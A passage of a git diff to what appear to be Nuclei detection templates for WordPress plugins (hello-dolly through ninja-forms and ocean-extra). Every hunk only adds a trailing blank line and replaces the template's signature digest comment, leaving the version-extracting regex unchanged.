100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cbc9c35e501acff1b9eab8c5ba07a0f575f308643973caea417a4a0c9c9779dc022100bb899a872ac6d0436cd8d15342ed35b866de4581d35ff31e63d8f0e0c70e6016:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022001e4e70c45c6ca7e9158abb2e1a86f165db6b668b2559856d16f46f87bac21ea022100aaded27f4c0489861a1b446a6b87cf9834637a306ce415e05f82eb08fb4578e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 2bb624afe9..8c01b26af1 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100af8f67630b8a1c57e34c07db44db5bc43cffed654c019551546d85b56662f5310220283908a3a68516a15266a50d34ba407a90518248e2684d014505b3810d461c55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210086c878662d227eb96788962f19331d0ade1cf1a4dff81c30a59c1b9a1d8273000221008fddc838b8d52e6d5ddca503f24e474ca6a855eb1d615f4e23fb4b9e3f64891d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index c598d1555f..2d59a6832e 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220798b3f4829a1d57be3dd1ebb7a0942327312cefb7931b2b5e889d649783f29d7022100b09f7f5d4b62aac4bd56f80cfae78777fd21bd4653bdf7d2dac8423b890fee65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022007926df58d487c2340b8f367bddd0da995ad137e08578de8afad2730e660290e022100a3f9ccbef8fe7dc0dec5e765c47afc478bea27eb78bea0d5d136c5f49fd777cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 535af27d2f..1009ca8480 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203633b198b7a8cad0cdbf7d4e6c053adcb5c1613f3ee8f46a2df6a195a3931c09022100a9580decf2084fa41c5b6285115a65b7f4f5598a82aea7f7b458e1149fed3b66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008f49e744dfa89e1850b7cb7695d9679b24c377d873f09d6fd9cadbbcd11e2549022100ce687e52603cf22b13585200eb7f903c893e62fc248faf2ee500fe0194170a2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 4011e0f815..6b64b20ef2 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220307007d12f11fd58f520ff0027e894f780ad067b0c7b0f35d913e2950dc6068302204dd2123693101909c3993179d52aaae21efa545800ff12bd68dc436ceb7e0944:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008f6d1e19d9e326e69ad971886abd386cd400ccf426a2b1ee8d37cbb7dd0279a402203fc7ea6e8ba4ae2ef7b0251dd83e5a9d8074919bb724fe0db5a5717e1852dbad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index bddaf8404b..b93ac9a85a 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100841570bbf86c880ae0aabeb31f826ebfe61417ff4947b84982aee3173692c53a022017abd5ed512ca3efe364dce7ef89f1e46b756800173724dc02653911f0384897:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220174b3ae69e11a8e1135754f6d0511d55c252d66b2d862b5fce41285527a615320220720c41a138f49f74969ebc65d71a2740f5e4b1f3167c23f3d0c159b68bcfbd92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 2b115e2740..7facd9f22e 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022010db937a6750eeb40ff59b08a97a3d3178a96ead6fb0fc97249540ff973f6014022015491dad6bcee688c73e0486d202042d4cf55995fec36e52d258e75c125f3385:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a23d887d06588816b446c62f86c485527b63e071dd86e1ed75e947f9416f45f6022047dbeb23cb9e5b2747b6d4b5078ccbd5f88bc2f34e5b25dc0420880d4b40c63c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 4f557cc72c..97bf0d98c1 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220456ea47bcb40bc67d9cd2c26a1a763703f313a1047921e005fd04fd3a572b04502204b7f1f2582b3a237ffc560b054d754ae512428daa04fe996bad91fa0566a7b2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e02d01a86f37d096aad19f9f29456c1f8f8c64173d95f4afd6631f0f6f449c08022014565ff90f56566d6d28e96cc580bddbd0ff62947bb2c3fcea4ed91f5cacb3e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 36ccd19a98..f2fc12d669 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004b7ea326ede6cbecb279ba3eaac9a0302e9ccff7d14bda05b4107b9315f963602204ea96cee8bcecf27fbe25f7cba0f61234756345f7251b5a8ae12b7216524bb32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207c707caea8452056ab9c68a82ee78a4952ddac29d007eb308033825f6d0fae15022066fa58edc282f6403e8345d4e0354b965c6c3583abfbc36e159d67ffc16fe257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 21504ea743..698899061c 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220785f17d66e8a75a33eb34a28c50781d11144fbc424c00d877942afe8a59669590221009734c0991430b25fe61ba999e3c7904e70ad20860ad18f5dcab651140cb98c74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f95484cd4e43d5dba78a2a62d414b390700eeb573f0784de1ba3549215b042ba0220421db4dbac32c32157f82026990fcb706d528895a826f16aea99e44d75da678c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 003bf77314..17d11abef8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a73080f8ab2d32f052b4b05ccd226c040f12897427006bdac54e45633ecf419402203d1dd5925a4e3926a4d1afc80de0165cc471ccbdfcea5a9f5ef1e967d4914d7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008835a82d84ca38e16019e06312e6e71637848776a9bc490fa8c777e715939f42022074d22cf4738bec3f3f0d282742285d231a0feef6c84f0483d6459438def66269:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index b1cfff8f7f..f2099b1dee 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100eeb5ba5be3b3289ad19b209807dc0714acd3f5c0499d5c729e71d8b9d85f82bf02203ee0619d5c412c9c3705849121b448c1d390c88b72c0129c561613313d86f54b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a468def0e19e75c2c7b8c6b5c2840e78866555ad4534e1871a846cbce3a77a5c022036c9957760cb8d66be88ac377e26aedfc70670fb243b72a84b6e022f86c1feb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 401ede4097..c7c634e59b 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f378ea1ab1e1b0e5419ecadee74d6c729bf324acbffd654aa329d591d627d9dc022100f9a11a06905f742c6c22fcaeb55714bbc142ee048d6c27167ce95669536150cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207a72741187422ecf39498b660c09d078b4f35586d65714364f2a331bea6365040220720e9903d0f5b60462ee59f9888390bcc19d309dcc9851c362c482662ac8fae1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 4fe9aefb31..a0bc3921c2 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203ef33c343a1a79345fb60b4058ea533cb05f87e83bcbb67342b2beccb5a5f3f0022100bef97d56cf6b8990ce23d62d2116776954d2b1a1a8b93858a8bd3247dc55b97b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100afdbd612b7b5a63dae8857375d96dbdd5e4a5ff606d56e4a8fb427efeddef9bd022002eb6fd535ae4540ee2ed602833efe9d98902ffc39fdd296f5f3e7c207a79110:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index eee0848a26..790c44f15a 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100adcbb658946a413dd0ce30b5e53f63e3fc772d49505c9dabd217f809a627560e02210090c6547c2b5937f299669b0b48dae81c96c324e7e36c324ea302d19384864b93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100de4e93262b4a98f29ff69ce76ee3c754fb57f11a850571f5923381c1600995d202205db25b79bfbcef33329ceea4afb9bfd64e1c4bc1e77a3246a4b59fc4d224d5cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index eb5cf45a56..8a79121d5e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202088f31c48ed4e060976e1f65476ec0fa74cda67c2f9d80d38f9c01ff7d67d940220339421e20d8cf4b849fb229924ac8ef3563d8443115f1091849d072e4f6c0de1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ab0eb5010c12a66154ec171b29348421e75516cc7f94bf5803984d6ce0ff4bd4022100ae9f59a8514d925ce792bb2ccef8d86965411f85da7c147d3d9158cedd9d42d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index d0f47f2329..384c90526c 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b3e4a352ab57ce5f54f14f5609d9defe6e4b9f109457e9615205f35d5e9164ff0221008a0eedb3af697ac62c2069edf11344e32680efc5947151494acff82c99887096:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ab4e7af37e097df8973b8b3858fe66814cd8bd0258ca5a91aa41ca02d8070b0f022100ac9c63531e0ae39ddb68685fb26022267b797c114dea7f25928a6bbe12726483:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 76e68f64ae..e5a6b79070 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207956a237b6aaeac82656894e27db78e3a0854432968547d34f95471a529f01ea022100889679103a10382c08bcc434526576798013cdbaf1028eb6044e8fa1495da84a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100841522f3d6592669452191d440dbbfabf2cc2e01a2dcdf5b540b4e1728c92e30022100d0d4783e2e7f7cc2cc1954c700480d4e1c5270587bd64e62c1d5be9d8eb9eecd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e80bdff41b..d566704cea 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008bf09168b10c091e6aff167e863814a8762760a04944c543ec8b0e834eef7f91022100b360eb5fdba4a6551bbc866bae410e44ac119570cbcc816afc3dc2974354e34c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220326d0cfb3f728a38d34a267f218672bc306fb3c5fab4b1e23901b85568275bea022100afcd314b62752d54b6c8cd6eff46ac5f3c111f312f9f4f2290e630eba254619f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index b1ae16ce90..fc513e837d 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100f2e5f8b07ddb9b6131cda95653c416fa293f13fd8aa0fc9b89ea13d36d68c6b10220134014e09c21ee5ef59a58cb3bd05366c228b78d2a885d0caef71f8e570a1b5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100fd0dd5054ae0418a6c2411748e5bf9547194aa98dd26bfd1f38470ecebed506c022026cbb8aff6627ee5716bc836c7ad6f86b075036ec710a60ca77b00d2fc74e9a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 4313a8714a..bba8716a83 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022031c407df0dc02dd7dd6575accc8c062bbc72fe979c3805c24ec2ec5db625e089022100c12d755a29ac86ae5059028751726d7ff3a1e66fd40c9e07995fc4616cf8d98e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022017c83aae7c5cf6ea6b63fa15f6121d6057738c1ecb5753fc6915a9712bebfd99022100eeeee84b589c2685c329aba33ed4fcaa531016524f75ddf8f064faf1c9b38448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index d92b0d4eb4..046ee0594d 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022009e7ed8de7851ee4dfb405bcb84730ccdf225e4c1e6b661f930c8e785f3931bc0221008ac18d1b29cc78048ee9e2c67e7197d4fe3fed9f156e3e20736a0c8526b8c8d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207b95fb33adafe460d209583ec6a50984b1759e3dd901d105a6c96c517231e1270220680251c1799715d3a0748ccb774d832c82d7616b83d9dc47f03210b7f4694b31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index e6f6c3be8a..32997ea76c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205880516a1631c89f86c24c1c56bdfb6acbb0f4ea046eeed0a05feae2fa915c8d022100eef81ce02af55c868344e709fbaf65c0b2310e53e988243ff82959935d23009f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d00e8dd1d6dacc1dd312942054591984b73bee683f80588de8433563ffc66e2b02206b4de09ffc208c5033029aa79d5e83c412f97d442317c9d0f95b771c2d86f2cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 2ebdd00ab9..b6f8007a10 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ed8de45df205c1703d59f8c06286ca9b48809d2270470b5c71afca72fe625d78022100ea7243897c54c9abbf4422de4e8e22facec2efdf338523d7ca8441786e0323eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022064ba1bcb3c9ad59f3775c046f400eaf15b77835273698008fd16a6b39794a1580220757956b15e3c631912463b26ef565b234b03fefa8169007db8cc4836977ad80a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 677bee8979..e9a1551060 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206b6d847463f48b0fae06ed288dcf80dbc8280ae1efeb100c5cc56419cff2861c022032b75923c81768fc90a673094e3373d1fda3ba1e8ebf21dc5624d7d67847d67a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ce292382f51ce3f19baa2ed10c1db513cca4742e92091e8b1bb6427ddaa00bf30221008a6c415cf0f5c942b3a01c6609b39e5696b78e656d940d5530d742ddd03d52c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 6cae0c30ee..35d9f8d360 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022011d2fc05875c12dc20f8988e5cd792cb3f5093248a74a6d3aa32a878cf6e3c5c02202fa29e07d1a9b28468c0b541c88e3a98bcab17524bdbf84efa6a01bffb0f1d34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022046f1dde522322556e2b08a364b545e0cc380b46ba14fdd8959df81261741ba8502210097d9be94872f8a6d05580bec9ec48d1287e2eed390a6ff7edfc6a40f38d55db6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 6344830b1e..bd859cde04 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ddcf2cb7ab89bc13d09cb52f5e86c4e1db0868b5afac4ba20aebf4eaeccb43f2022100a26b8ffb74c6490f6112f8008a46fa4169d7e3fd4ad1e8fe82985119e296c3a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e9162bc446766c0174de1199f7046e5712239802938b33530952320dc9d9895802207331fc50fd51ef9e161d971040f3b123c3cf90a2fc7b0421c4a1f035d04f0d00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 536c2b7850..8d479f3c23 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202e214336d135df79897439d201a8c0d41ba763b5acd8bd97fd6e0fe0b0b9c29b022100aa5835bf04dcb3448d35b0a294636b2f10b9cebb2aa0044c562cfb079d3a1014:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402205d77b772bc63a7ac6f5565af0d9446a86b339f1e0659fca3911f99be2f3172fd02202d5cf4d281e9abc1d41722b3034e2d579403b092484511bafa2b9ef7cbc31a25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index d646cc270d..cbedb148d9 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f20a825c56f7104f5d6ce66cb262d07ed58dd090d63fede665603310f7953120022100c632630310c203776593ff57932d2474ac0b3140ecb8eb63cefbdc0bc00a974c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ec6172c64b987f34f81ac42ef6f8297ab6152334c5ad377d9eea397c21a7f126022100a86ab79d27d5f6c50b5fef1ac42422c51603f188cc437828133544ab322be924:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 6a113da897..db1c8d8f75 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a9d6705fa2b1ada332d2032bd1c9949976e3929c17cea629cd101c95cd97dc1802210095eb869f0510ee3a608fe792dd49f5cc749da003f43aaa95c7fb459d8da0863c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b1d38ef83084043654b859f914add9ce090ed966f19ca2a38a60e29e1d97f4060221009795a86e0860fb6ea0d24fa3b5fd7da91c8ef856e1ed66cfcfdd7b325da4d522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 40167d1d42..ea030327a8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022036c60cb3d1484a8429a2a8c95421ba0816d0c39191ac57c3d9cce9f9142e0f0e022100f322708d9c42245ae91c757f504a1aeaea7ed6cf4c5f707b20b63c4963e864c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f0d9ba87a0487405017dc0dc1425870bef3b18b725fed012bf805f20329324f102205a66291520466d7d8cfdc2865de03f465e728364ce8dac8964cde2b2bc46fc3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 8be1bca3e0..f55daac474 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206f7e498458dbac6fa2982067dbb64ccc4d64603fa616321de8e4dbc34a0cd89a02203df644ed475f5104a2d9a8c7f6bff08ee999324b64e3940f63e13480ab79e5f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022055585b4aa3205e118651f17ba3fe836ada0056ba7a72056c70486e4de84bf96e022015469c565544b15d8cce8a77c55e9edb596ed2563eb4f9ad5a90afe49bc282d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 3f4c9c4202..38a0c7e391 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202afac696fe8300ede83d9de4dd9ceeeedc99683cac0a26c84cd94affbf43b87602210085b736e93caf2e635066a7a75c5ed54ab4c25c90332a51ee0e14fc23020d5341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202f49d6524a1da2267d5c4ff61990ab156287875f754ef858ba83499dba3c69de0221009b43b65149ec02247d63abf4731d325e493e9cc0157493fbe48959a80937efcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index b22e7ceb0a..03311d7f42 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220155f5e7b4c76809ac77d6389abc09070da2a92661e73f667c0b713dbbad195f002203725c3d77954361f0f9849a42a86926def21ffc4312187a15f5de6ba61c1e9b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220453b144292c66ba38a8a182bab30e17e811d40bfe80ce43095cc3a84d5e03ff202210083aa56aa792173a5fbebda357ee5df6c573028d05ccdeeb309c6f8c4c0aa3646:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml 